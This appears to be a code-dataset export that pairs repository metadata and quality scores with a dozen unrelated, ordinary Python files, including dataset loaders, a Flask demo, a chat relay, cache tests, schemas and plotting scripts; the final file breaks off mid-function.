0
0
0.012346
0.216129
310
12
72
25.833333
0.806584
0.067742
0
0
0
0
0.34375
0
0
0
0
0
0
1
0
true
0
0.111111
0
0.111111
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
911891456d9e7cb41632224dd81128e9e0fa9e6b
2,776
py
Python
observations/r/bomsoi.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
199
2017-07-24T01:34:27.000Z
2022-01-29T00:50:55.000Z
observations/r/bomsoi.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
46
2017-09-05T19:27:20.000Z
2019-01-07T09:47:26.000Z
observations/r/bomsoi.py
hajime9652/observations
2c8b1ac31025938cb17762e540f2f592e302d5de
[ "Apache-2.0" ]
45
2017-07-26T00:10:44.000Z
2022-03-16T20:44:59.000Z
# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import division from __future__ import print_function import csv import numpy as np import os import sys from observations.util import maybe_download_and_extract def bomsoi(path): """Southern Oscillation Index Data The Southern Oscillation Index (SOI) is the difference in barometric pressure at sea level between Tahiti and Darwin. Annual SOI and Australian rainfall data, for the years 1900-2001, are given. Australia's annual mean rainfall is an area-weighted average of the total annual precipitation at approximately 370 rainfall stations around the country. This data frame contains the following columns: Year a numeric vector Jan average January SOI values for each year Feb average February SOI values for each year Mar average March SOI values for each year Apr average April SOI values for each year May average May SOI values for each year Jun average June SOI values for each year Jul average July SOI values for each year Aug average August SOI values for each year Sep average September SOI values for each year Oct average October SOI values for each year Nov average November SOI values for each year Dec average December SOI values for each year SOI a numeric vector consisting of average annual SOI values avrain a numeric vector consisting of a weighted average annual rainfall at a large number of Australian sites NTrain Northern Territory rain northRain north rain seRain southeast rain eastRain east rain southRain south rain swRain southwest rain Australian Bureau of Meteorology web pages: http://www.bom.gov.au/climate/change/rain02.txt and http://www.bom.gov.au/climate/current/soihtm1.shtml Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `bomsoi.csv`. Returns: Tuple of np.ndarray `x_train` with 106 rows and 21 columns and dictionary `metadata` of column headers (feature names). """ import pandas as pd path = os.path.expanduser(path) filename = 'bomsoi.csv' if not os.path.exists(os.path.join(path, filename)): url = 'http://dustintran.com/data/r/DAAG/bomsoi.csv' maybe_download_and_extract(path, url, save_file_name='bomsoi.csv', resume=False) data = pd.read_csv(os.path.join(path, filename), index_col=0, parse_dates=True) x_train = data.values metadata = {'columns': data.columns} return x_train, metadata
22.942149
74
0.699207
390
2,776
4.905128
0.484615
0.06116
0.075274
0.100366
0.198641
0.023001
0
0
0
0
0
0.01013
0.253242
2,776
120
75
23.133333
0.912687
0.67255
0
0
0
0
0.09126
0
0
0
0
0
0
1
0.045455
false
0
0.409091
0
0.5
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
9118ae0e8ce4a6964c33407d1f9bb269a5f81229
948
py
Python
openpype/hosts/houdini/plugins/publish/validate_bypass.py
dangerstudios/OpenPype
10ddcc4699137888616eec57cd7fac9648189714
[ "MIT" ]
null
null
null
openpype/hosts/houdini/plugins/publish/validate_bypass.py
dangerstudios/OpenPype
10ddcc4699137888616eec57cd7fac9648189714
[ "MIT" ]
null
null
null
openpype/hosts/houdini/plugins/publish/validate_bypass.py
dangerstudios/OpenPype
10ddcc4699137888616eec57cd7fac9648189714
[ "MIT" ]
null
null
null
import pyblish.api
import openpype.api


class ValidateBypassed(pyblish.api.InstancePlugin):
    """Validate all primitives build hierarchy from attribute when enabled.

    The name of the attribute must exist on the prims and have the same name
    as Build Hierarchy from Attribute's `Path Attribute` value on the Alembic
    ROP node whenever Build Hierarchy from Attribute is enabled.

    """

    order = openpype.api.ValidateContentsOrder - 0.1
    families = ["*"]
    hosts = ["houdini"]
    label = "Validate ROP Bypass"

    def process(self, instance):
        invalid = self.get_invalid(instance)
        if invalid:
            rop = invalid[0]
            raise RuntimeError(
                "ROP node %s is set to bypass, publishing cannot continue.."
                % rop.path()
            )

    @classmethod
    def get_invalid(cls, instance):
        rop = instance[0]
        if rop.isBypassed():
            return [rop]
27.085714
78
0.632911
111
948
5.387387
0.558559
0.070234
0.090301
0.135452
0
0
0
0
0
0
0
0.005926
0.287975
948
34
79
27.882353
0.88
0.292194
0
0
0
0
0.131376
0
0
0
0
0
0
1
0.1
false
0.2
0.1
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
9119b7e105152a68ddb6c7704cd3d58179e633e6
4,687
py
Python
gavPrj/dataset_core.py
GavinK-ai/cv
6dd11b2100c40aca281508c3821c807ef0ee227d
[ "MIT" ]
1
2021-11-15T06:16:44.000Z
2021-11-15T06:16:44.000Z
gavPrj/dataset_core.py
JKai96/cv
6dd11b2100c40aca281508c3821c807ef0ee227d
[ "MIT" ]
null
null
null
gavPrj/dataset_core.py
JKai96/cv
6dd11b2100c40aca281508c3821c807ef0ee227d
[ "MIT" ]
null
null
null
import os import cv2 as cv import matplotlib.pyplot as plt import numpy as np #srcPaths = ('dataset/Screenshot1','dataset/Screenshot2','dataset/Screenshot3', 'dataset/Screenshot4') #srcPaths = ('all_dataset/s1', # 'all_dataset/s10', # 'all_dataset/s11', # 'all_dataset/s12', # 'all_dataset/s13', # 'all_dataset/s14', # 'all_dataset/s15', # 'all_dataset/s16', # 'all_dataset/s17', # 'all_dataset/s18', # 'all_dataset/s19', # 'all_dataset/s2', # 'all_dataset/s20', # 'all_dataset/s21', # 'all_dataset/s22', # 'all_dataset/s23', # 'all_dataset/s24', # 'all_dataset/s25', # 'all_dataset/s26', # 'all_dataset/s27', # 'all_dataset/s28', # 'all_dataset/s29', # 'all_dataset/s3', # 'all_dataset/s30', # 'all_dataset/s31', # 'all_dataset/s32', # 'all_dataset/s33', # 'all_dataset/s34', # 'all_dataset/s35', # 'all_dataset/s36', # 'all_dataset/s37', # 'all_dataset/s38', # 'all_dataset/s39', # 'all_dataset/s4', # 'all_dataset/s40', # 'all_dataset/s41', # 'all_dataset/s42', # 'all_dataset/s43', # 'all_dataset/s44', # 'all_dataset/s45', # 'all_dataset/s46', # 'all_dataset/s47', # 'all_dataset/s48', # 'all_dataset/s49', # 'all_dataset/s5', # 'all_dataset/s50', # 'all_dataset/s51', # 'all_dataset/s52', # 'all_dataset/s53', # 'all_dataset/s54', # 'all_dataset/s55', # 'all_dataset/s56', # 'all_dataset/s57', # 'all_dataset/s58', # 'all_dataset/s59', # 'all_dataset/s6', # 'all_dataset/s60', # 'all_dataset/s61', # 'all_dataset/s62', # 'all_dataset/s63', # 'all_dataset/s7', # 'all_dataset/s8', # 'all_dataset/s9') srcPaths = ('testdataset/t1','testdataset/t2') datasetfilename = 'testdataset1.npz' def create_dataset(datasetfilename, srcPaths, classNames): imgList = [] labelList = [] labelNameList = [] for srcPath in srcPaths: # append all files in srcPath dir into imgList and labelList for fname in os.listdir(srcPath): filePath = os.path.join(srcPath, fname) img = cv.imread(filePath) # spilt the last text in file name to save as label fname_no_ext = os.path.splitext(fname)[0] # label = fname_no_ext[-1] label = fname_no_ext imgList.append(img) labelList.append(classNames[label]) labelNameList.append(label) # convert to imgList to numpy images = np.array(imgList, dtype='object') labels = np.array(labelList, dtype='object') labelnames = np.array(labelNameList) # save converted images and labels into compressed numpy zip file np.savez_compressed(datasetfilename, images=images, labels=labels, labelnames=labelnames) return True def displayImg(): # for fname in os.listdir(srcPath): pass if __name__ == '__main__': # save a dataset in numpy compressed format # datasetfilename = 'tiredataset.npz' classNames = {'afiq':0, 'azureen':1, 'gavin':2, 'goke':3, 'inamul':4, 'jincheng':5, 'mahmuda':6, 'numan':7, 'saseendran':8} if create_dataset(datasetfilename, srcPaths, classNames): data = np.load(datasetfilename, allow_pickle=True) imgList = data['images'] labelList = data['labels'] labelNameList = data['labelnames'] img = imgList[0] label = labelList[0] labelNameList = data['labelnames'] imgRGB = img[:, :, ::-1] plt.imshow(imgRGB) plt.title(label) plt.show() print(imgList.shape) print(labelList.shape) # imgList, labelList = create_dataset() # img = imgList[0] # label = labelList[0] # imgRGB = img[:, :, ::-1] # plt.imshow(imgRGB) # plt.title(label) # plt.show() # img = imgList[1] # label = labelList[1] # imgRGB = img[:, :, ::-1] # plt.imshow(imgRGB) # plt.title(label) # plt.show() # img = imgList[3] # label = labelList[3] # imgRGB = img[:, :, ::-1] # plt.imshow(imgRGB) # plt.title(label) # plt.show()
26.331461
128
0.528056
486
4,687
4.923868
0.343621
0.263268
0.016715
0.02173
0.165483
0.127037
0.083577
0.083577
0.083577
0.083577
0
0.047299
0.332409
4,687
177
129
26.480226
0.717482
0.427992
0
0.047619
0
0
0.058687
0
0
0
0
0
0
1
0.047619
false
0.02381
0.095238
0
0.166667
0.047619
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
9127b9612983c8643c1eb5911a7a12880ad76607
803
py
Python
web13/jsonapi.py
gongjunhuang/web
9412f6fd7c223174fdb30f4d7a8b61a8e130e329
[ "Apache-2.0" ]
null
null
null
web13/jsonapi.py
gongjunhuang/web
9412f6fd7c223174fdb30f4d7a8b61a8e130e329
[ "Apache-2.0" ]
null
null
null
web13/jsonapi.py
gongjunhuang/web
9412f6fd7c223174fdb30f4d7a8b61a8e130e329
[ "Apache-2.0" ]
null
null
null
from flask import Flask, redirect, url_for, jsonify, request

app = Flask(__name__)

users = []

'''
Json api

The request carries JSON in the form and the response returns JSON.

Benefits:
1. A uniform communication format, so there are fewer constraints on the language
2. Easy to expose as an open api
3. Heavy client-side rendering

RESTful api
Dr. Fielding

URLs are organised around resources (nouns)

/GET /players          fetch all players
/GET /player/id        fetch the data of the player with this id
/PUT /players          full update
/PATCH /players        partial update
/DELETE /player/id     delete one player
/GET /player/id/level
'''


@app.route("/", methods=["GET"])
def index():
    return '''<form method=post action='/add'>
    <input type=text name=author>
    <button>Submit</button>
    </form>
    '''


@app.route("/add", methods=["POST"])
def add():
    form = request.form
    users.append(dict(author=form.get("author", "")))
    return redirect(url_for(".index"))


@app.route("/json")
def json():
    return jsonify(users)


app.run()
16.387755
60
0.636364
107
803
4.719626
0.560748
0.047525
0.055446
0
0
0
0
0
0
0
0
0.004658
0.198007
803
49
61
16.387755
0.779503
0
0
0
0
0
0.268245
0
0
0
0
0
0
1
0.157895
false
0
0.052632
0.105263
0.315789
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
912a168bff4536c4b4657348252f51f09a3dbc8c
1,776
py
Python
MoMMI/Modules/ss14_nudges.py
T6751/MoMMI
4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a
[ "MIT" ]
18
2016-08-06T17:31:59.000Z
2021-12-24T13:08:02.000Z
MoMMI/Modules/ss14_nudges.py
T6751/MoMMI
4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a
[ "MIT" ]
29
2016-08-07T14:03:00.000Z
2022-01-23T21:05:33.000Z
MoMMI/Modules/ss14_nudges.py
T6751/MoMMI
4b9dd0d49c6e2bd82b82a4893fc35475d4e39e9a
[ "MIT" ]
25
2016-08-08T12:56:02.000Z
2022-02-09T07:17:51.000Z
import logging
from typing import Match, Any, Dict
import aiohttp
from discord import Message
from MoMMI import comm_event, command, MChannel, always_command

logger = logging.getLogger(__name__)


@comm_event("ss14")
async def ss14_nudge(channel: MChannel, message: Any, meta: str) -> None:
    try:
        config: Dict[str, Any] = channel.module_config(f"ss14.servers.{meta}")
    except ValueError:
        return

    expect_password = config["password"]

    if expect_password != message.get("password"):
        return

    if "type" not in message or "contents" not in message:
        return

    contents = message["contents"]
    type = message["type"]

    if type == "ooc":
        final_message = f"\u200B**OOC**: `{contents['sender']}`: {contents['contents']}"
    else:
        return

    await channel.send(final_message)


@always_command("ss14_relay", unsafe=True)
async def ss14_relay(channel: MChannel, match: Match, message: Message) -> None:
    if not channel.internal_name:
        return

    content = message.content
    content = content.strip()

    if not content or content[0] == "\u200B":
        return

    server = None
    config: Any
    for config in channel.server_config("modules.ss14", []):
        if config["discord_channel"] != channel.internal_name:
            continue
        server = config["server"]

    if not server:
        return

    config = channel.module_config(f"ss14.servers.{server}")
    password = config["password"]
    url = config["api_url"] + "/ooc"

    async with aiohttp.ClientSession() as session:
        async with session.post(url, json={"password": password, "sender": message.author.name, "contents": content}) as resp:
            r = await resp.text()
            logger.error(f"{resp.status}")
27.75
126
0.649212
214
1,776
5.285047
0.35514
0.013263
0.02122
0.035367
0.054819
0.054819
0
0
0
0
0
0.015284
0.226351
1,776
63
127
28.190476
0.80786
0
0
0.148936
0
0
0.141329
0.037162
0
0
0
0
0
1
0
false
0.085106
0.106383
0
0.255319
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
912c1f2c9b394208b14b4781f1f67d739e19f340
539
py
Python
spoon/models/groupmembership.py
mikeboers/Spoon
9fe4a06be7c2c6c307b79e72893e32f2006de4ea
[ "BSD-3-Clause" ]
4
2017-11-05T02:54:39.000Z
2022-03-01T06:01:20.000Z
spoon/models/groupmembership.py
mikeboers/Spoon
9fe4a06be7c2c6c307b79e72893e32f2006de4ea
[ "BSD-3-Clause" ]
null
null
null
spoon/models/groupmembership.py
mikeboers/Spoon
9fe4a06be7c2c6c307b79e72893e32f2006de4ea
[ "BSD-3-Clause" ]
null
null
null
import sqlalchemy as sa

from ..core import db


class GroupMembership(db.Model):

    __tablename__ = 'group_memberships'
    __table_args__ = dict(
        autoload=True,
        extend_existing=True,
    )

    user = db.relationship('Account',
        foreign_keys='GroupMembership.user_id',
        backref=db.backref('groups', cascade="all, delete-orphan"),
    )
    group = db.relationship('Account',
        foreign_keys='GroupMembership.group_id',
        backref=db.backref('members', cascade="all, delete-orphan"),
    )
22.458333
68
0.651206
57
539
5.894737
0.578947
0.083333
0.125
0.166667
0.279762
0.279762
0
0
0
0
0
0
0.226345
539
23
69
23.434783
0.805755
0
0
0
0
0
0.236059
0.087361
0
0
0
0
0
1
0
false
0
0.125
0
0.4375
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
912dd1c1fee777c8a3a588b4ebb22c1cb4588df4
1,790
py
Python
data/cache/test/test_cache.py
dongboyan77/quay
8018e5bd80f17e6d855b58b7d5f2792d92675905
[ "Apache-2.0" ]
1
2020-10-16T19:30:41.000Z
2020-10-16T19:30:41.000Z
data/cache/test/test_cache.py
dongboyan77/quay
8018e5bd80f17e6d855b58b7d5f2792d92675905
[ "Apache-2.0" ]
15
2020-06-18T15:32:06.000Z
2022-03-03T23:06:24.000Z
data/cache/test/test_cache.py
dongboyan77/quay
8018e5bd80f17e6d855b58b7d5f2792d92675905
[ "Apache-2.0" ]
null
null
null
import pytest

from mock import patch

from data.cache import InMemoryDataModelCache, NoopDataModelCache, MemcachedModelCache
from data.cache.cache_key import CacheKey


class MockClient(object):
    def __init__(self, server, **kwargs):
        self.data = {}

    def get(self, key, default=None):
        return self.data.get(key, default)

    def set(self, key, value, expire=None):
        self.data[key] = value


@pytest.mark.parametrize("cache_type", [(NoopDataModelCache), (InMemoryDataModelCache),])
def test_caching(cache_type):
    key = CacheKey("foo", "60m")
    cache = cache_type()

    # Perform two retrievals, and make sure both return.
    assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}
    assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}


def test_memcache():
    key = CacheKey("foo", "60m")
    with patch("data.cache.impl.Client", MockClient):
        cache = MemcachedModelCache(("127.0.0.1", "-1"))
        assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}
        assert cache.retrieve(key, lambda: {"a": 1234}) == {"a": 1234}


def test_memcache_should_cache():
    key = CacheKey("foo", None)

    def sc(value):
        return value["a"] != 1234

    with patch("data.cache.impl.Client", MockClient):
        cache = MemcachedModelCache(("127.0.0.1", "-1"))
        assert cache.retrieve(key, lambda: {"a": 1234}, should_cache=sc) == {"a": 1234}

        # Ensure not cached since it was `1234`.
        assert cache._get_client().get(key.key) is None

        # Ensure cached.
        assert cache.retrieve(key, lambda: {"a": 2345}, should_cache=sc) == {"a": 2345}
        assert cache._get_client().get(key.key) is not None
        assert cache.retrieve(key, lambda: {"a": 2345}, should_cache=sc) == {"a": 2345}
32.545455
89
0.634078
231
1,790
4.82684
0.272727
0.049327
0.119283
0.138117
0.463677
0.463677
0.463677
0.463677
0.408072
0.408072
0
0.057383
0.201676
1,790
54
90
33.148148
0.722883
0.058101
0
0.352941
0
0
0.06302
0.026159
0
0
0
0
0.264706
1
0.205882
false
0
0.117647
0.058824
0.411765
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
9136160d5624a0c97151f5a92ef4449fe0be2b28
1,951
py
Python
ArraysP2.py
EdgarVallejo96/pyEdureka
f103f67ed4f9eee6ab924237e9d94a489e602c7c
[ "MIT" ]
null
null
null
ArraysP2.py
EdgarVallejo96/pyEdureka
f103f67ed4f9eee6ab924237e9d94a489e602c7c
[ "MIT" ]
null
null
null
ArraysP2.py
EdgarVallejo96/pyEdureka
f103f67ed4f9eee6ab924237e9d94a489e602c7c
[ "MIT" ]
null
null
null
import array as arr

a = arr.array('i', [ 1,2,3,4,5,6])
print(a)

# Accessing elements
print(a[2])
print(a[-2])

# BASIC ARRAY OPERATIONS

# Find length of array
print()
print('Length of array')
print(len(a))

# Adding elements to an array
# append() to add a single element at the end of an array
# extend() to add more than one element at the end of an array
# insert() to add an element at a specific position in an array
print()

# append
print('Append')
a.append(8)
print(a)

# extend
print()
print('Extend')
a.extend([9,8,6,5,4])
print(a)

# insert
print()
print('Insert')
a.insert(2,6)  # first param is the index, second param is the value
print(a)

# Removing elements from an array
# pop() Remove an element and return it
# remove() Remove element with a specific value without returning it
print()
print(a)

# pop
print('pop')
print(a.pop())  # removes last element
print(a)
print(a.pop(2))
print(a)
print(a.pop(-1))
print(a)

# remove
print()
print('remove')
print(a.remove(8))  # doesn't return what it removes; it removes the first occurrence of '8'
print(a)

# Array Concatenation
print()
print('Array Concatenation')
b = arr.array('i', [1,2,3,4,5,6,7])
c = arr.array('i', [3,4,2,1,3,5,6,7,8])
d = arr.array('i')
d = b + c
print(d)

# Slicing an Array
print()
print('Slicing an Array')
# This means fetching some particular values from an array
print(d)
print(d[0:5])  # Doesn't include the value at the right index
print(d[0:-2])
print(d[::-1])  # Reverse the array; this method is not preferred because it exhausts the memory

# Looping through an Array
print()
print('Looping through an Array')
print('Using for')
for x in d:
    print(x, end=' ')
print()
for x in d[0:-3]:
    print(x, end=' ')
print()
print('Using while')
temp = 0
while temp < d[2]:
    print(d[temp], end=' ')
    temp = temp + 1  # Can use temp += 1, it's the same thing
print()
print(a)
tem = 0
while tem < len(a):
    print(a[tem], end=' ')
    tem += 1
print()
18.759615
95
0.664787
357
1,951
3.633053
0.282913
0.078643
0.046261
0.01542
0.123362
0.060139
0.060139
0.02313
0.02313
0
0
0.030492
0.17632
1,951
103
96
18.941748
0.776602
0.441312
0
0.402985
0
0
0.121583
0
0
0
0
0
0
1
0
false
0
0.014925
0
0.014925
0.746269
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
913e527c83f21ed4118adbad50f5935916d3a9fa
2,221
py
Python
src/backend/schemas/vps.py
ddddhm1/LuWu
f9feaf10a6aca0dd31f250741a1c542ee5256633
[ "Apache-2.0" ]
658
2019-04-29T02:46:02.000Z
2022-03-30T03:58:42.000Z
src/backend/schemas/vps.py
ddddhm1/LuWu
f9feaf10a6aca0dd31f250741a1c542ee5256633
[ "Apache-2.0" ]
9
2020-06-04T13:38:58.000Z
2022-02-27T21:23:29.000Z
src/backend/schemas/vps.py
ddddhm1/LuWu
f9feaf10a6aca0dd31f250741a1c542ee5256633
[ "Apache-2.0" ]
130
2019-05-02T23:42:58.000Z
2022-03-24T04:35:37.000Z
from typing import List
from typing import Optional
from typing import Union

from models.vps import VpsStatus
from schemas.base import APIModel
from schemas.base import BasePagination
from schemas.base import BaseSchema
from schemas.base import BaseSuccessfulResponseModel


class VpsSshKeySchema(APIModel):
    name: str
    public_key: str = None
    private_key: str = None
    isp_id: int
    ssh_key_id: Optional[str]
    date_created: Optional[str]
    fingerprint: Optional[str]


class VpsSpecPlanSchema(APIModel):
    name: str
    plan_code: Union[str, int]
    region_codes: List = None
    bandwidth: float
    ram: int
    vcpu: int
    disk: int
    price_monthly: Union[float, int, str] = None
    price_hourly: Union[float, int, str] = None
    price_yearly: Union[float, int, str] = None


class VpsSpecRegionSchema(APIModel):
    name: str
    region_code: Union[str, int]
    features: List[str] = None
    plan_codes: List[Union[str, int]] = []


class VpsSpecOsSchema(APIModel):
    name: str
    os_code: Union[str, int]
    region_codes: List[Union[str, int]] = []
    plan_codes: List[Union[str, int]] = []


class VpsSpecSchema(APIModel):
    region: List[VpsSpecRegionSchema] = []
    plan: List[VpsSpecPlanSchema] = []
    os: List[VpsSpecOsSchema] = []


class VpsSpecResponse(BaseSuccessfulResponseModel):
    result: VpsSpecSchema


class VpsCreateSchema(APIModel):
    hostname: str
    isp_id: int
    region_code: str
    os_code: str
    plan_code: str
    ssh_keys: List[str] = []
    status: int = VpsStatus.init
    remark: str = None


class VpsItemSchema(BaseSchema):
    isp_id: int
    ip: Union[int, str, None]
    server_id: Optional[str]
    hostname: str
    os: Optional[str]
    plan: Optional[str]
    region: Optional[str]
    status: int
    status_name: str
    status_msg: Optional[str]
    isp_provider_name: str


class VpsItemResponse(BaseSuccessfulResponseModel):
    result: VpsItemSchema


class VpsPaginationSchema(BasePagination):
    items: Optional[List[VpsItemSchema]]


class VpsPaginationResponse(BaseSuccessfulResponseModel):
    result: VpsPaginationSchema


class VpsSshKeyResponseSchema(BaseSuccessfulResponseModel):
    result: List[VpsSshKeySchema]
22.663265
59
0.714093
257
2,221
6.066148
0.2607
0.03592
0.042335
0.053881
0.127646
0.107761
0.07569
0
0
0
0
0
0.197659
2,221
97
60
22.896907
0.87486
0
0
0.152778
0
0
0
0
0
0
0
0
0
1
0
true
0
0.111111
0
1
0.013889
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
913effe79b3a41e71c6774354a20673cc5bf2cf7
672
py
Python
main.py
hari-sh/sigplot
cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81
[ "MIT" ]
null
null
null
main.py
hari-sh/sigplot
cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81
[ "MIT" ]
null
null
null
main.py
hari-sh/sigplot
cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81
[ "MIT" ]
null
null
null
import sigplot as sp

import matplotlib
import matplotlib.pyplot as plt
import numpy as np

matplotlib.rcParams['toolbar'] = 'None'
plt.style.use('dark_background')
fig = plt.figure()

# seed = np.linspace(3, 7, 1000)
# a = (np.sin(2 * np.pi * seed))
# b = (np.cos(2 * np.pi * seed))
# sp.correlate(fig, b, a, 300)

t = np.linspace(0, 1, 500)
b = (np.cos(2 * np.pi * t))
# x = np.concatenate([np.zeros(500), signal.sawtooth(2 * np.pi * 5 * t), np.zeros(500), np.ones(120), np.zeros(500)])
x = np.concatenate([np.zeros(500), np.ones(500), np.zeros(500)])
sp.fourier_series(fig, x, 100, 200, 200)

plt.show()

# WriteToVideo("twoPulse.mp4", anim);
25.846154
118
0.623512
114
672
3.657895
0.45614
0.083933
0.119904
0.043165
0.220624
0.167866
0
0
0
0
0
0.09058
0.178571
672
25
119
26.88
0.664855
0.40625
0
0
0
0
0.070845
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
9143b8c633adb2c76477406a889fd2a426c5cda8
278
py
Python
gigamonkeys/get.py
gigamonkey/sheets
a89e76360ad9a35e44e5e352346eeccbe6952b1f
[ "BSD-3-Clause" ]
null
null
null
gigamonkeys/get.py
gigamonkey/sheets
a89e76360ad9a35e44e5e352346eeccbe6952b1f
[ "BSD-3-Clause" ]
1
2021-04-03T23:07:35.000Z
2021-04-03T23:07:35.000Z
gigamonkeys/get.py
gigamonkey/sheets
a89e76360ad9a35e44e5e352346eeccbe6952b1f
[ "BSD-3-Clause" ]
null
null
null
#!/usr/bin/env python

import json
import sys

from gigamonkeys.spreadsheets import spreadsheets

spreadsheet_id = sys.argv[1]
ranges = sys.argv[2:]

data = spreadsheets().get(spreadsheet_id, include_grid_data=bool(ranges), ranges=ranges)

json.dump(data, sys.stdout, indent=2)
19.857143
88
0.773381
41
278
5.146341
0.585366
0.123223
0
0
0
0
0
0
0
0
0
0.012048
0.104317
278
13
89
21.384615
0.835341
0.071942
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.428571
0
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
9146c7949d8b05d057e0f629fb324a047f0358c0
6,145
py
Python
sources/wrappers.py
X-rayLaser/keras-auto-hwr
67cfc0209045b1e211f0491b0199cb9d6811bfd0
[ "MIT" ]
null
null
null
sources/wrappers.py
X-rayLaser/keras-auto-hwr
67cfc0209045b1e211f0491b0199cb9d6811bfd0
[ "MIT" ]
2
2020-01-04T09:03:31.000Z
2021-05-10T18:29:41.000Z
sources/wrappers.py
X-rayLaser/keras-auto-hwr
67cfc0209045b1e211f0491b0199cb9d6811bfd0
[ "MIT" ]
null
null
null
import numpy as np from sources import BaseSource from sources.base import BaseSourceWrapper from sources.preloaded import PreLoadedSource import json class WordsSource(BaseSource): def __init__(self, source): self._source = source def __len__(self): return len(self._source) def _remove_apostrpohs(self, seq): res = ''.join(seq.split('&apos;')) res = ''.join(res.split('&quot;')) return res def _clean(self, seq): s = '' for ch in seq.strip(): if ch.isalpha(): s += ch return s def get_sequences(self): for seq_in, transcription in self._source.get_sequences(): transcription = self._remove_apostrpohs(transcription) words = [self._clean(word) for word in transcription.split(' ')] yield seq_in, words class LabelSource(BaseSource): def __init__(self, source, mapping_table): self._source = source self._mapping_table = mapping_table def __len__(self): return len(self._source) def get_sequences(self): for seq_in, seq_out in self._source.get_sequences(): label_seq = [self._mapping_table.encode(ch) for ch in seq_out] yield seq_in, label_seq class CTCAdaptedSource(BaseSource): def __init__(self, source, padding_value=0): self._source = source self._padding = padding_value def __len__(self): return len(self._source) def get_sequences(self): for seq_in, seq_out in self._source.get_sequences(): seqs_in_pad = list(seq_in) while len(seqs_in_pad) <= 2 * len(seq_out) + 1: n = len(seqs_in_pad[0]) seqs_in_pad.append([self._padding] * n) yield seqs_in_pad, seq_out class Normalizer: def __init__(self): self._mu = None self._sd = None @staticmethod def from_json(path): with open(path, 'r') as f: s = f.read() d = json.loads(s) normalizer = Normalizer() mu = np.array(d['mu']) sd = np.array(d['sd']) normalizer.set_mean(mu) normalizer.set_deviation(sd) return normalizer def to_json(self, path): d = { 'mu': np.array(self.mu).tolist(), 'sd': np.array(self.sd).tolist() } with open(path, 'w') as f: f.write(json.dumps(d)) def set_mean(self, mu): self._mu = mu def set_deviation(self, sd): self._sd = sd @property def mu(self): return self._mu @property def sd(self): return self._sd def fit(self, X): sequence = [] for x in X: sequence.extend(x) self._mu = np.mean(sequence, axis=0) self._sd = np.std(sequence, axis=0) def preprocess(self, X): res = [] for x in X: x_norm = (x - self._mu) / self._sd # we do not want to normalize END-OF-STROKE flag which is last in the tuple x_norm[:, -1] = np.array(x)[:, -1] res.append(x_norm.tolist()) return res class OffsetPointsSource(BaseSource): def __init__(self, source): self._source = source def __len__(self): return len(self._source) def get_sequences(self): for strokes, transcription in self._source.get_sequences(): x0, y0, t0 = strokes[0].points[0] new_seq = [] for stroke in strokes: points = [] for x, y, t in stroke.points: points.append((x - x0, y - y0, t - t0, 0)) points[-1] = points[-1][:-1] + (1,) new_seq.extend(points) yield new_seq, transcription class NormalizedSource(BaseSource): def __init__(self, source, normalizer): self._source = source self._normalizer = normalizer def __len__(self): return len(self._source) def get_sequences(self): for points, transcription in self._source.get_sequences(): norm = self._normalizer.preprocess([points])[0] yield norm, transcription class DenormalizedSource(BaseSource): def __init__(self, source, normalizer): self._source = source self._normalizer = normalizer def __len__(self): return len(self._source) def get_sequences(self): mu = self._normalizer.mu sd = self._normalizer.sd for points, transcription in self._source.get_sequences(): 
